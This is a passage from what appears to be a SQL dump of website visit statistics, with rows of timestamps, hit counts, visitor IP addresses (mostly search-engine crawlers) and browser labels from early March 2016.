'),(12181,1456952698,14,1,13,0,'66.249.69.124',''),(12182,1456952856,4,1,3,0,'66.249.69.124',''),(12183,1456952960,2,1,1,0,'66.249.69.3',''),(12184,1456953175,2,1,1,0,'66.249.69.3',''),(12185,1456953333,36,36,0,0,'82.193.127.15','other'),(12186,1456953469,1,0,1,0,'66.249.75.101',''),(12187,1456953711,1,1,0,0,'157.55.39.80','other'),(12188,1456953717,1,1,0,0,'217.69.136.210','other'),(12189,1456953757,1,0,1,0,'66.249.75.108',''),(12190,1456953783,12,0,12,0,'66.249.69.124',''),(12191,1456954005,2,1,1,0,'66.249.69.11',''),(12192,1456954395,14,1,13,0,'66.249.69.124',''),(12193,1456954583,27,1,26,0,'66.249.69.124',''),(12194,1456954904,2,2,0,0,'93.158.152.9','other'),(12195,1456955569,4,0,4,0,'66.249.69.11',''),(12196,1456956443,19,0,19,0,'66.249.69.124',''),(12197,1456956926,2,1,1,0,'66.249.69.11',''),(12198,1456957189,3,3,0,0,'141.8.184.18','other'),(12199,1456957471,1,1,0,0,'66.249.69.11','other'),(12200,1456957733,4,0,4,0,'66.249.69.124',''),(12201,1456957741,3,0,3,0,'66.249.69.3',''),(12202,1456957800,1,1,0,0,'66.249.91.4','other'),(12203,1456957881,1,0,1,0,'66.249.75.94',''),(12204,1456958170,193,193,0,0,'80.91.162.99','other'),(12205,1456958218,1,1,0,0,'89.218.71.214','other'),(12206,1456958289,1,0,1,0,'66.249.75.101',''),(12207,1456958506,1,1,0,0,'66.249.75.94','other'),(12208,1456958543,1,1,0,0,'66.249.69.11','other'),(12209,1456958553,1,1,0,0,'180.76.15.143','other'),(12210,1456958972,1,1,0,0,'66.249.69.124','other'),(12211,1456959049,1,0,1,0,'66.249.75.108',''),(12212,1456959056,1,1,0,0,'8.29.198.26','other'),(12213,1456959228,2,2,0,0,'112.206.227.206','other'),(12214,1456959621,1,0,1,0,'68.180.229.232',''),(12215,1456960025,11,0,11,0,'66.249.69.124',''),(12216,1456960036,1,1,0,0,'89.218.71.214','other'),(12217,1456960090,1,1,0,0,'66.249.75.101','other'),(12218,1456960472,4,0,4,0,'66.249.69.3',''),(12219,1456960588,1,1,0,0,'178.154.189.204','other'),(12220,1456960612,3,0,3,0,'66.249.69.11',''),(12221,1456960690,1,1,0,0,'114.34.197.253','other'),(12222,1456960928,6,0,6,0,'66.249.69.124',''),(12223,1456961331,1,1,0,0,'141.8.184.18','other'),(12224,1456961828,2,0,2,0,'66.249.69.11',''),(12225,1456961889,1,0,1,0,'66.249.69.3',''),(12226,1456961932,20,0,20,0,'66.249.69.124',''),(12227,1456962487,26,1,25,0,'66.249.69.124',''),(12228,1456962729,31,1,30,0,'66.249.69.124',''),(12229,1456962873,1,1,0,0,'217.69.136.210','other'),(12230,1456963266,1,0,1,0,'68.180.229.232',''),(12231,1456963370,1,1,0,0,'180.76.15.143','other'),(12232,1456963381,3,0,3,0,'66.249.69.3',''),(12233,1456963747,2,1,1,0,'66.249.69.124',''),(12234,1456963840,33,1,32,0,'66.249.69.124',''),(12235,1456964506,6,6,0,0,'141.8.184.18','other'),(12236,1456964513,4,4,0,0,'178.154.149.11','other'),(12237,1456964515,6,6,0,0,'141.8.183.14','other'),(12238,1456964517,3,3,0,0,'93.158.152.9','other'),(12239,1456964519,2,2,0,0,'5.255.253.53','other'),(12240,1456964523,1,1,0,0,'212.117.180.21','chrome'),(12241,1456964784,1,0,1,0,'68.180.229.232',''),(12242,1456964785,3,0,3,0,'66.249.69.3',''),(12243,1456964787,5,0,5,0,'66.249.69.124',''),(12244,1456965756,1,0,1,0,'66.249.75.94',''),(12245,1456965901,3,3,0,0,'178.154.149.11','other'),(12246,1456965905,4,4,0,0,'141.8.184.18','other'),(12247,1456966658,3,1,2,0,'66.249.69.3',''),(12248,1456967145,2,0,2,0,'68.180.229.232',''),(12249,1456967274,5,0,5,0,'66.249.69.124',''),(12250,1456967743,3,0,3,0,'66.249.69.11',''),(12251,1456967837,2,0,2,0,'66.249.69.3',''),(12252,1456968075,1,1,0,0,'141.8.132.44','other'),(12253,1456968079,2,2,0,0,'141.8.132.74','other'),(12254,1456968201,1,1,0,0,'66.249.91.63','other'),(12255,1456968209,1,1,0,0,'178.154.189.12','other'),(12256,1456968213,1,1,0,0,'141.8.184.11','other'),(12257,1456968222,1,1,0,0,'130.193.51.22','other'),(12258,1456968266,1,0,1,0,'68.180.229.232',''),(12259,1456968334,1,0,1,0,'66.249.69.124',''),(12260,1456968434,5,5,0,0,'82.193.127.15','other'),(12261,1456968644,2,1,1,0,'66.249.69.3',''),(12262,1456968727,3,0,3,0,'66.249.69.11',''),(12263,1456969162,2,0,2,0,'66.249.75.101',''),(12264,1456969544,19,0,19,0,'66.249.69.124',''),(12265,1456969879,1,1,0,0,'8.29.198.26','other'),(12266,1456970233,3,0,3,0,'66.249.69.3',''),(12267,1456970375,1,1,0,0,'141.8.184.18','other'),(12268,1456970611,29,1,28,0,'66.249.69.124',''),(12269,1456970710,1,1,0,0,'217.69.143.69','other'),(12270,1456970808,1,0,1,0,'66.249.75.94',''),(12271,1456970810,2,1,1,0,'66.249.69.11',''),(12272,1456970898,3,1,2,0,'66.249.69.11',''),(12273,1456971105,2,2,0,0,'69.30.215.118','other'),(12274,1456971243,2,2,0,0,'130.193.37.21','other'),(12275,1456971252,1,1,0,0,'141.8.184.22','other'),(12276,1456971256,1,1,0,0,'141.8.132.97','other'),(12277,1456971261,1,1,0,0,'5.255.253.110','other'),(12278,1456971265,1,1,0,0,'141.8.142.88','other'),(12279,1456971269,1,1,0,0,'5.255.253.30','other'),(12280,1456971274,1,1,0,0,'5.255.253.55','other'),(12281,1456971279,2,2,0,0,'141.8.132.76','other'),(12282,1456971282,2,2,0,0,'178.154.149.11','other'),(12283,1456971288,1,1,0,0,'5.255.253.53','other'),(12284,1456971296,1,1,0,0,'141.8.132.99','other'),(12285,1456971301,1,1,0,0,'130.193.51.81','other'),(12286,1456971309,1,1,0,0,'130.193.51.85','other'),(12287,1456971514,21,0,21,0,'66.249.69.124',''),(12288,1456971851,1,0,1,0,'68.180.229.232',''),(12289,1456972008,4,0,4,0,'66.249.69.3',''),(12290,1456972253,1,1,0,0,'66.249.69.3','other'),(12291,1456972280,1,1,0,0,'141.8.184.18','other'),(12292,1456972638,3,1,2,0,'66.249.69.11',''),(12293,1456972945,19,4,15,0,'66.249.69.124',''),(12294,1456973116,7,7,0,0,'92.236.71.145','other'),(12295,1456973162,2,0,2,0,'66.249.69.3',''),(12296,1456973191,1,1,0,0,'178.154.149.11','other'),(12297,1456973195,1,1,0,0,'141.8.183.14','other'),(12298,1456973246,2,0,2,0,'68.180.229.232',''),(12299,1456973334,3,1,2,0,'66.249.69.124',''),(12300,1456973353,6,1,5,0,'66.249.69.124',''),(12301,1456973654,1,0,1,0,'66.249.75.108',''),(12302,1456974029,1,1,0,0,'107.21.1.8','other'),(12303,1456974110,2,0,2,0,'66.249.69.11',''),(12304,1456974957,4,0,4,0,'66.249.69.3',''),(12305,1456974959,1,1,0,0,'180.76.15.29','other'),(12306,1456974966,11,0,11,0,'66.249.69.124',''),(12307,1456975087,1,1,0,0,'130.193.51.81','other'),(12308,1456975092,1,1,0,0,'130.193.51.43','other'),(12309,1456975096,1,1,0,0,'178.154.149.11','other'),(12310,1456975417,1,1,0,0,'66.249.75.94','other'),(12311,1456975427,2,0,2,0,'66.249.69.11',''),(12312,1456975867,86,0,86,0,'66.249.69.124',''),(12313,1456976383,1,1,0,0,'130.193.51.85','other'),(12314,1456976391,1,1,0,0,'141.8.184.6','other'),(12315,1456976396,1,1,0,0,'130.193.37.21','other'),(12316,1456976946,5,0,5,0,'66.249.69.124',''),(12317,1456977287,1,1,0,0,'5.255.253.55','other'),(12318,1456977291,4,0,4,0,'66.249.69.11',''),(12319,1456977417,1,1,0,0,'141.8.132.79','other'),(12320,1456977421,1,1,0,0,'130.193.37.27','other'),(12321,1456977719,1,1,0,0,'66.249.75.101','other'),(12322,1456977816,1,1,0,0,'5.255.253.10','other'),(12323,1456977826,1,1,0,0,'5.255.253.110','other'),(12324,1456977832,1,1,0,0,'141.8.132.99','other'),(12325,1456977870,11,0,11,0,'66.249.69.124',''),(12326,1456977986,28,1,27,0,'66.249.69.124',''),(12327,1456978523,1,1,0,0,'66.249.69.11','other'),(12328,1456978542,1,1,0,0,'180.76.15.141','other'),(12329,1456978714,1,1,0,0,'66.249.69.3','other'),(12330,1456978880,1,1,0,0,'66.249.91.4','other'),(12331,1456978899,2,1,1,0,'66.249.69.124',''),(12332,1456979223,1,1,0,0,'217.69.133.11','other'),(12333,1456979333,1,0,1,0,'68.180.229.232',''),(12334,1456979404,1,1,0,0,'178.154.189.6','other'),(12335,1456979520,1,0,1,0,'66.249.69.11',''),(12336,1456979582,1,0,1,0,'66.249.75.94',''),(12337,1456979598,1,1,0,0,'178.154.189.12','other'),(12338,1456979797,3,0,3,0,'66.249.69.3',''),(12339,1456980053,13,0,13,0,'66.249.69.124',''),(12340,1456980458,1,0,1,0,'68.180.229.232',''),(12341,1456980623,1,1,0,0,'217.69.133.21','other'),(12342,1456980709,2,2,0,0,'66.249.69.124','other'),(12343,1456980739,1,1,0,0,'8.29.198.25','other'),(12344,1456980765,1,1,0,0,'66.249.75.101','other'),(12345,1456981149,1,1,0,0,'93.158.152.26','other'),(12346,1456981266,1,1,0,0,'157.55.39.80','other'),(12347,1456981438,2,1,1,0,'66.249.69.3',''),(12348,1456981562,1,1,0,0,'141.8.132.97','other'),(12349,1456981566,1,1,0,0,'5.255.253.55','other'),(12350,1456981836,136,136,0,0,'82.193.127.15','other'),(12351,1456981911,2,1,1,0,'66.249.69.11',''),(12352,1456982143,1,0,1,0,'66.249.69.124',''),(12353,1456982166,1,1,0,0,'212.117.180.21','chrome'),(12354,1456982290,1,1,0,0,'207.46.13.90','other'),(12355,1456982459,4,1,3,0,'66.249.69.3',''),(12356,1456982560,38,2,36,0,'66.249.69.124',''),(12357,1456982828,1,1,0,0,'66.102.9.84','firefox'),(12358,1456983059,1,1,0,0,'217.69.143.67','other'),(12359,1456983230,1,0,1,0,'68.180.229.232',''),(12360,1456983379,1,1,0,0,'207.46.13.188','other'),(12361,1456983448,1,1,0,0,'180.76.15.156','other'),(12362,1456983469,44,0,44,0,'66.249.69.124',''),(12363,1456984105,2,0,2,0,'66.249.69.11',''),(12364,1456984123,1,1,0,0,'66.249.93.94','other'),(12365,1456984681,11,0,11,0,'66.249.69.124',''),(12366,1456985276,1,0,1,0,'68.180.229.232',''),(12367,1456985464,2,0,2,0,'66.249.69.11',''),(12368,1456985591,22,0,22,0,'66.249.69.124',''),(12369,1456985843,1,1,0,0,'141.8.142.10','other'),(12370,1456985847,1,1,0,0,'130.193.51.81','other'),(12371,1456985946,3,0,3,0,'66.249.69.3',''),(12372,1456986099,1,1,0,0,'141.8.184.22','other'),(12373,1456986127,1,0,1,0,'66.249.75.108',''),(12374,1456986311,1,1,0,0,'92.113.31.216','firefox'),(12375,1456986347,1,0,1,0,'66.249.69.51',''),(12376,1456986695,1,1,0,0,'217.69.133.250','other'),(12377,1456986745,1,1,0,0,'107.189.60.75','other'),(12378,1456986746,1,1,0,0,'107.189.60.75','firefox'),(12379,1456986985,2,0,2,0,'66.249.69.43',''),(12380,1456987188,1,1,0,0,'178.154.189.201','other'),(12381,1456987232,1,1,0,0,'178.92.68.160','chrome'),(12382,1456987615,1,1,0,0,'66.249.93.86','other'),(12383,1456987733,22,0,22,0,'66.249.69.124',''),(12384,1456987745,1,0,1,0,'66.249.69.51',''),(12385,1456987756,7,0,7,0,'66.249.69.35',''),(12386,1456987820,2,2,0,0,'141.8.132.76','other'),(12387,1456987972,1,0,1,0,'66.249.66.158',''),(12388,1456988019,1,1,0,0,'37.53.88.36','chrome'),(12389,1456988193,2,1,1,0,'66.249.69.11',''),(12390,1456988258,1,1,0,0,'5.255.253.53','other'),(12391,1456988263,1,1,0,0,'5.255.253.55','other'),(12392,1456988558,2,1,1,0,'66.249.75.108',''),(12393,1456988623,1,1,0,0,'91.236.184.19','chrome'),(12394,1456988687,1,1,0,0,'66.249.69.124','other'),(12395,1456988762,1,1,0,0,'107.21.1.8','other'),(12396,1456988805,1,1,0,0,'37.54.85.178','chrome'),(12397,1456989351,1,0,1,0,'66.249.69.11',''),(12398,1456989386,1,1,0,0,'5.255.253.53','other'),(12399,1456989387,1,1,0,0,'217.69.133.85','other'),(12400,1456989420,1,1,0,0,'66.249.91.8','other'),(12401,1456989657,1,1,0,0,'141.8.183.14','other'),(12402,1456989661,1,1,0,0,'141.8.184.11','other'),(12403,1456989666,3,3,0,0,'141.8.132.79','other'),(12404,1456989674,2,2,0,0,'141.8.132.76','other'),(12405,1456989679,2,2,0,0,'130.193.51.43','other'),(12406,1456989696,2,2,0,0,'141.8.132.2','other'),(12407,1456989701,1,1,0,0,'130.193.37.27','other'),(12408,1456989705,1,1,0,0,'93.158.152.26','other'),(12409,1456989709,1,1,0,0,'141.8.142.41','other'),(12410,1456989713,1,1,0,0,'5.255.253.100','other'),(12411,1456989718,1,1,0,0,'5.255.253.30','other'),(12412,1456989722,1,1,0,0,'141.8.132.99','other'),(12413,1456989726,1,1,0,0,'5.255.253.110','other'),(12414,1456989938,3,0,3,0,'66.249.69.124',''),(12415,1456989944,1,1,0,0,'91.196.178.71','firefox'),(12416,1456990078,1,1,0,0,'217.69.133.227','other'),(12417,1456990214,3,0,3,0,'66.249.69.3',''),(12418,1456990466,6,1,5,0,'66.249.69.124',''),(12419,1456991115,1,0,1,0,'68.180.229.232',''),(12420,1456991166,1,1,0,0,'66.249.93.94','firefox'),(12421,1456991198,1,0,1,0,'66.249.69.3',''),(12422,1456991230,1,1,0,0,'195.238.108.90','chrome'),(12423,1456991290,2,0,2,0,'66.249.69.11',''),(12424,1456991343,1,1,0,0,'66.249.93.94','other'),(12425,1456991373,9,0,9,0,'66.249.69.124',''),(12426,1456991544,1,1,0,0,'91.196.178.66','chrome'),(12427,1456991675,1,1,0,0,'78.111.186.59','opera'),(12428,1456991786,1,1,0,0,'8.29.198.25','other'),(12429,1456991905,2,2,0,0,'66.249.69.3','other'),(12430,1456992675,1,1,0,0,'207.46.13.188','other'),(12431,1456992677,1,1,0,0,'5.255.253.30','other'),(12432,1456992685,2,1,1,0,'66.249.69.124',''),(12433,1456992714,1,1,0,0,'141.8.132.76','other'),(12434,1456992718,1,1,0,0,'141.8.132.79','other'),(12435,1456992726,1,1,0,0,'141.8.142.41','other'),(12436,1456992730,1,1,0,0,'130.193.51.85','other'),(12437,1456992735,1,1,0,0,'141.8.184.18','other'),(12438,1456992739,1,1,0,0,'178.154.149.11','other'),(12440,1456992743,1,1,0,0,'141.8.183.14','other'),(12441,1456992747,1,1,0,0,'93.158.152.9','other'),(12442,1456992751,1,1,0,0,'5.255.253.53','other'),(12443,1456992868,1,1,0,0,'91.196.178.134','chrome'),(12444,1456993348,1,1,0,0,'78.31.180.242','chrome'),(12445,1456993681,1,1,0,0,'91.196.178.70','chrome'),(12446,1456993997,2,0,2,0,'66.249.69.11',''),(12447,1456994148,1,1,0,0,'95.132.102.240','chrome'),(12448,1456994311,1,1,0,0,'157.55.39.85','other'),(12449,1456994391,1,1,0,0,'141.8.142.8','other'),(12450,1456994810,1,1,0,0,'91.196.178.169','chrome'),(12451,1456994897,1,1,0,0,'207.46.13.188','other'),(12452,1456994983,1,1,0,0,'66.249.93.94','other'),(12453,1456995030,1,1,0,0,'91.196.177.44','chrome'),(12454,1456995033,1,0,1,0,'66.249.69.124',''),(12455,1456995071,1,1,0,0,'217.69.133.240','other'),(12456,1456995570,1,1,0,0,'207.46.13.90','other'),(12457,1456995605,1,0,1,0,'66.249.75.108',''),(12458,1456995687,1,1,0,0,'91.196.178.68','chrome'),(12459,1456995800,1,1,0,0,'91.196.178.71','firefox'),(12460,1456995858,1,1,0,0,'157.55.39.85','other'),(12461,1456996261,1,0,1,0,'66.249.69.11',''),(12462,1456996401,1,0,1,0,'68.180.229.232',''),(12463,1456996423,1,1,0,0,'141.8.184.11','other'),(12464,1456996424,1,1,0,0,'141.8.184.22','other'),(12465,1456996426,1,1,0,0,'5.255.253.55','other'),(12466,1456996445,3,0,3,0,'66.249.69.124',''),(12467,1456996506,1,1,0,0,'82.193.127.15','other'),(12468,1456996559,1,1,0,0,'141.8.142.8','other'),(12469,1456996563,1,1,0,0,'130.193.51.45','other'),(12470,1456996567,1,1,0,0,'141.8.142.88','other'),(12471,1456996571,2,2,0,0,'93.158.152.9','other'),(12472,1456996575,1,1,0,0,'5.255.253.10','other'),(12473,1456996618,1,0,1,0,'66.249.75.94',''),(12474,1456996724,1,1,0,0,'91.196.178.71','firefox'),(12475,1456996783,1,1,0,0,'195.211.175.37','chrome'),(12476,1456996807,1,1,0,0,'130.193.37.27','other'),(12477,1456996866,1,1,0,0,'89.22.244.182','chrome'),(12478,1456996976,2,1,1,0,'66.249.69.3',''),(12479,1456997315,1,1,0,0,'94.179.51.158','firefox'),(12480,1456997473,2,2,0,0,'66.249.69.11','other'),(12481,1456997506,1,1,0,0,'91.196.178.69','firefox'),(12482,1456997568,1,1,0,0,'157.55.39.85','other'),(12483,1456997698,2,2,0,0,'66.249.69.3','other'),(12484,1456997708,2,2,0,0,'178.95.246.242','chrome'),(12485,1456997861,2,2,0,0,'69.30.215.106','other'),(12486,1456997890,1,1,0,0,'78.111.190.95','firefox'),(12487,1456997929,1,1,0,0,'5.255.253.53','other'),(12488,1456997930,1,1,0,0,'130.193.37.21','other'),(12489,1456997933,1,1,0,0,'141.8.132.99','other'),(12490,1456997936,1,1,0,0,'141.8.184.31','other'),(12491,1456998367,1,1,0,0,'91.196.178.134','chrome'),(12492,1456998438,1,1,0,0,'141.8.132.97','other'),(12493,1456998510,1,1,0,0,'141.8.142.41','other'),(12494,1456998512,1,1,0,0,'130.193.51.85','other'),(12495,1456998534,1,1,0,0,'130.193.51.45','other'),(12496,1456998599,1,1,0,0,'66.249.93.94','other'),(12497,1456998707,1,1,0,0,'213.179.254.100','chrome'),(12498,1456998948,1,1,0,0,'62.210.170.165','other'),(12499,1456999105,3,0,3,0,'68.180.229.232',''),(12500,1456999161,1,1,0,0,'207.46.13.90','other'),(12501,1456999465,1,1,0,0,'94.179.29.37','chrome'),(12502,1456999688,2,0,2,0,'66.249.69.3',''),(12503,1456999989,1,1,0,0,'207.46.13.93','other'),(12504,1457000188,2,2,0,0,'141.8.132.76','other'),(12505,1457000368,1,1,0,0,'66.249.75.94','other'),(12506,1457000386,2,2,0,0,'66.249.69.124','other'),(12507,1457000614,1,1,0,0,'66.249.69.3','other'),(12508,1457000820,1,1,0,0,'66.249.91.8','other'),(12509,1457001280,1,1,0,0,'130.193.51.50','other'),(12510,1457001281,1,1,0,0,'5.255.253.17','other'),(12511,1457001293,1,1,0,0,'178.93.4.55','firefox'),(12512,1457001298,1,0,1,0,'66.249.69.11',''),(12513,1457001369,1,1,0,0,'207.46.13.93','other'),(12514,1457001530,2,2,0,0,'109.108.88.38','firefox'),(12515,1457001939,1,1,0,0,'66.249.79.181','other'),(12516,1457002026,2,1,1,0,'66.249.69.3',''),(12517,1457002130,70,70,0,0,'82.193.127.15','other'),(12518,1457002287,1,1,0,0,'130.193.51.109','other'),(12519,1457002291,1,1,0,0,'141.8.132.97','other'),(12520,1457002295,1,1,0,0,'141.8.142.60','other'),(12521,1457002299,1,1,0,0,'130.193.51.55','other'),(12522,1457002304,1,1,0,0,'5.255.253.51','other'),(12523,1457002305,1,1,0,0,'66.249.75.101','other'),(12524,1457002409,2,0,2,0,'66.249.69.11',''),(12525,1457002420,1,1,0,0,'66.249.69.124','other'),(12526,1457002458,1,1,0,0,'66.249.69.3','other'),(12527,1457002616,1,1,0,0,'8.29.198.25','other'),(12528,1457002792,1,1,0,0,'5.255.253.62','other'),(12529,1457003146,1,1,0,0,'180.76.15.32','other'),(12530,1457003185,1,1,0,0,'157.55.39.85','other'),(12531,1457003215,2,2,0,0,'66.249.69.11','other'),(12532,1457003733,1,1,0,0,'37.53.154.187','chrome'),(12533,1457003856,1,0,1,0,'66.249.75.108',''),(12534,1457003940,1,1,0,0,'66.249.69.3','other'),(12535,1457003960,1,1,0,0,'178.93.27.139','chrome'),(12536,1457003998,2,0,2,0,'68.180.229.232',''),(12537,1457004098,1,1,0,0,'66.249.75.108','other'),(12538,1457004109,1,1,0,0,'217.69.143.42','other'),(12539,1457004726,2,0,2,0,'66.249.69.11',''),(12540,1457004823,1,1,0,0,'195.211.175.37','chrome'),(12541,1457004985,1,1,0,0,'141.8.132.109','other'),(12542,1457004989,1,1,0,0,'130.193.50.22','other'),(12543,1457005395,2,0,2,0,'66.249.69.124',''),(12544,1457005521,1,0,1,0,'66.249.69.3',''),(12545,1457005690,1,1,0,0,'37.73.206.70','other'),(12546,1457005848,1,1,0,0,'66.249.93.90','other'),(12547,1457006176,1,1,0,0,'178.92.144.2','chrome'),(12548,1457006262,1,1,0,0,'37.52.154.27','chrome'),(12549,1457006322,1,0,1,0,'66.249.69.11',''),(12550,1457006403,1,0,1,0,'68.180.229.232',''),(12551,1457006734,4,4,0,0,'130.193.50.22','other'),(12552,1457006838,9,9,0,0,'5.255.253.89','other'),(12553,1457006848,5,5,0,0,'141.8.132.74','other'),(12554,1457006849,6,6,0,0,'178.154.189.12','other'),(12555,1457006850,7,7,0,0,'141.8.132.48','other'),(12556,1457006855,4,4,0,0,'5.255.253.17','other'),(12558,1457006857,3,3,0,0,'93.158.152.81','other'),(12559,1457006871,7,7,0,0,'130.193.50.31','other'),(12561,1457006927,7,7,0,0,'130.193.51.22','other'),(12562,1457006929,5,5,0,0,'130.193.51.91','other'),(12563,1457006930,5,5,0,0,'5.255.253.94','other'),(12564,1457006971,3,3,0,0,'141.8.184.31','other'),(12565,1457006974,5,5,0,0,'141.8.132.66','other'),(12566,1457007032,2,2,0,0,'141.8.142.82','other'),(12567,1457007059,1,1,0,0,'37.53.89.22','chrome'),(12568,1457007065,7,7,0,0,'93.158.152.65','other'),(12569,1457007067,4,4,0,0,'130.193.51.50','other'),(12570,1457007068,5,5,0,0,'130.193.51.7','other'),(12571,1457007069,7,7,0,0,'130.193.51.43','other'),(12572,1457007070,4,4,0,0,'178.154.189.6','other'),(12574,1457007071,8,8,0,0,'141.8.132.44','other'),(12575,1457007123,1,1,0,0,'5.255.253.53','other'),(12576,1457007126,5,5,0,0,'5.255.253.62','other'),(12577,1457007127,6,6,0,0,'141.8.132.109','other'),(12578,1457007131,1,1,0,0,'141.8.132.99','other'),(12579,1457007139,2,2,0,0,'130.193.51.109','other'),(12580,1457007141,1,1,0,0,'93.158.152.26','other'),(12581,1457007148,2,2,0,0,'178.154.149.9','other'),(12582,1457007150,1,1,0,0,'5.255.253.30','other'),(12583,1457007151,2,2,0,0,'141.8.142.55','other'),(12584,1457007152,2,2,0,0,'141.8.142.60','other'),(12585,1457007153,3,3,0,0,'5.255.253.103','other'),(12587,1457007162,1,1,0,0,'141.8.142.8','other'),(12588,1457007163,5,5,0,0,'141.8.184.6','other'),(12589,1457007173,1,1,0,0,'141.8.184.22','other'),(12590,1457007177,1,1,0,0,'5.255.253.51','other'),(12591,1457007183,1,1,0,0,'130.193.51.55','other'),(12592,1457007185,1,1,0,0,'141.8.132.79','other'),(12593,1457007195,1,1,0,0,'141.8.142.41','other'),(12594,1457007206,2,2,0,0,'178.154.149.11','other'),(12595,1457007240,1,1,0,0,'141.8.142.10','other'),(12596,1457007570,1,0,1,0,'66.249.69.3',''),(12597,1457007918,1,1,0,0,'207.46.13.90','other'),(12598,1457007924,1,0,1,0,'68.180.229.232',''),(12599,1457007936,1,1,0,0,'141.8.132.74','other'),(12600,1457008055,1,1,0,0,'212.111.196.39','chrome'),(12601,1457008062,1,0,1,0,'66.249.69.11',''),(12602,1457008101,2,0,2,0,'66.249.69.124',''),(12603,1457008190,1,1,0,0,'91.196.178.67','firefox'),(12604,1457008222,1,1,0,0,'95.132.112.24','chrome'),(12605,1457008401,1,1,0,0,'178.154.149.9','other'),(12606,1457008406,1,1,0,0,'141.8.132.44','other'),(12607,1457008410,1,1,0,0,'130.193.51.22','other'),(12608,1457008415,1,1,0,0,'5.255.253.51','other'),(12609,1457008418,1,1,0,0,'130.193.50.22','other'),(12610,1457008422,1,1,0,0,'141.8.142.82','other'),(12611,1457008427,1,1,0,0,'5.255.253.62','other'),(12612,1457008631,1,1,0,0,'130.193.51.7','other'),(12613,1457008732,1,1,0,0,'141.8.132.109','other'),(12614,1457008736,1,1,0,0,'130.193.51.55','other'),(12615,1457008740,1,1,0,0,'130.193.50.31','other'),(12616,1457008815,1,1,0,0,'91.196.177.69','chrome'),(12617,1457008893,12,12,0,0,'141.8.183.14','other'),(12618,1457008897,1,1,0,0,'5.255.253.103','other'),(12619,1457009064,73,73,0,0,'141.8.184.18','other'),(12620,1457009090,49,49,0,0,'178.154.149.11','other'),(12621,1457009132,8,8,0,0,'93.158.152.9','other'),(12622,1457009329,1,1,0,0,'5.255.253.53','other'),(12623,1457009396,1,1,0,0,'66.249.93.86','other'),(12624,1457009651,2,1,1,0,'66.249.66.162',''),(12625,1457009780,1,1,0,0,'91.196.178.68','firefox'),(12626,1457009897,1,1,0,0,'180.76.15.159','other'),(12627,1457009899,1,1,0,0,'180.76.15.21','other'),(12628,1457010008,1,1,0,0,'178.154.149.11','other'),(12629,1457010146,1,1,0,0,'207.46.13.188','other'),(12630,1457010279,1,1,0,0,'91.196.178.71','firefox'),(12631,1457010285,1,1,0,0,'91.196.178.69','firefox'),(12632,1457010349,1,0,1,0,'66.249.66.166',''),(12633,1457010432,13,13,0,0,'141.8.184.18','other'),(12634,1457010434,9,9,0,0,'93.158.152.9','other'),(12635,1457010437,1,1,0,0,'207.46.13.90','other'),(12636,1457010587,1,1,0,0,'95.135.0.4','chrome'),(12637,1457010670,1,1,0,0,'91.124.79.41','firefox'),(12638,1457010805,1,0,1,0,'66.249.66.162',''),(12639,1457010923,5,5,0,0,'141.8.183.14','other'),(12640,1457010924,3,3,0,0,'130.193.37.21','other'),(12641,1457011024,9,9,0,0,'178.154.149.11','other'),(12642,1457011032,5,5,0,0,'5.255.253.53','other'),(12643,1457011054,1,1,0,0,'141.8.132.99','other'),(12644,1457011055,1,1,0,0,'93.158.152.65','other'),(12645,1457011056,1,1,0,0,'141.8.132.66','other'),(12646,1457011477,1,0,1,0,'66.249.66.158',''),(12647,1457011588,1,1,0,0,'217.69.143.42','other'),(12648,1457011627,1,0,1,0,'66.249.66.166',''),(12649,1457011727,1,1,0,0,'178.92.120.75','chrome'),(12650,1457011800,1,1,0,0,'66.249.92.95','other'),(12651,1457011933,1,1,0,0,'217.69.133.85','other'),(12652,1457012083,2,2,0,0,'130.193.37.21','other'),(12653,1457012247,1,1,0,0,'91.196.178.71','firefox'),(12654,1457012348,1,1,0,0,'66.249.66.166','other'),(12655,1457012456,1,0,1,0,'66.249.66.158',''),(12656,1457012669,1,0,1,0,'68.180.229.232',''),(12657,1457012748,24,24,0,0,'178.154.149.11','other'),(12658,1457012791,1,1,0,0,'207.46.13.90','other'),(12659,1457012794,17,17,0,0,'141.8.184.18','other'),(12660,1457012795,9,9,0,0,'141.8.183.14','other'),(12662,1457012797,5,5,0,0,'5.255.253.53','other'),(12663,1457012799,4,4,0,0,'93.158.152.9','other'),(12664,1457012887,36,36,0,0,'178.151.143.163','other'),(12665,1457012913,3,0,3,0,'66.249.66.162',''),(12666,1457013091,1,1,0,0,'37.53.90.175','firefox'),(12667,1457013172,1,1,0,0,'46.203.9.131','chrome'),(12668,1457013204,1,1,0,0,'195.238.180.166','chrome'),(12669,1457013330,1,1,0,0,'91.196.178.71','firefox'),(12670,1457013357,2,0,2,0,'66.249.66.158',''),(12671,1457013453,1,1,0,0,'8.29.198.25','other'),(12672,1457013539,1,1,0,0,'77.222.140.6','firefox'),(12673,1457013595,1,1,0,0,'37.9.122.200','other'),(12675,1457013868,1,0,1,0,'66.249.66.162',''),(12676,1457014061,3,3,0,0,'91.196.178.69','firefox'),(12677,1457014269,1,0,1,0,'66.249.66.158',''),(12678,1457014489,1,1,0,0,'91.196.178.71','firefox'),(12679,1457014613,1,1,0,0,'207.46.13.188','other'),(12680,1457014901,1,1,0,0,'91.196.178.70','firefox'),(12681,1457014951,1,0,1,0,'66.249.66.129',''),(12682,1457014996,1,1,0,0,'130.193.51.45','other'),(12683,1457014997,1,1,0,0,'5.255.253.10','other'),(12684,1457014998,1,1,0,0,'93.158.152.26','other'),(12686,1457015000,1,1,0,0,'5.255.253.9','other'),(12687,1457015102,1,1,0,0,'178.94.31.116','chrome'),(12688,1457015361,1,0,1,0,'66.249.66.158',''),(12689,1457015364,1,1,0,0,'95.108.133.218','chrome'),(12690,1457015517,1,1,0,0,'141.8.184.18','other'),(12691,1457016512,1,1,0,0,'66.249.93.90','other'),(12692,1457016555,1,1,0,0,'91.196.178.71','firefox'),(12693,1457016567,3,3,0,0,'31.172.191.135','chrome'),(12694,1457016719,1,0,1,0,'66.249.66.166',''),(12695,1457016721,1,1,0,0,'66.249.66.166','other'),(12696,1457016903,1,1,0,0,'195.214.199.245','chrome'),(12697,1457016969,1,1,0,0,'66.249.66.162','other'),(12698,1457017152,2,0,2,0,'66.249.66.158',''),(12699,1457017222,1,1,0,0,'141.8.183.14','other'),(12700,1457017223,2,2,0,0,'93.158.152.9','other'),(12701,1457017224,2,2,0,0,'178.154.149.11','other'),(12702,1457017225,1,1,0,0,'5.255.253.53','other'),(12703,1457017471,1,1,0,0,'91.196.178.67','chrome'),(12704,1457017573,1,1,0,0,'91.196.178.39','chrome'),(12705,1457017622,1,1,0,0,'207.46.13.90','other'),(12706,1457017775,1,1,0,0,'91.196.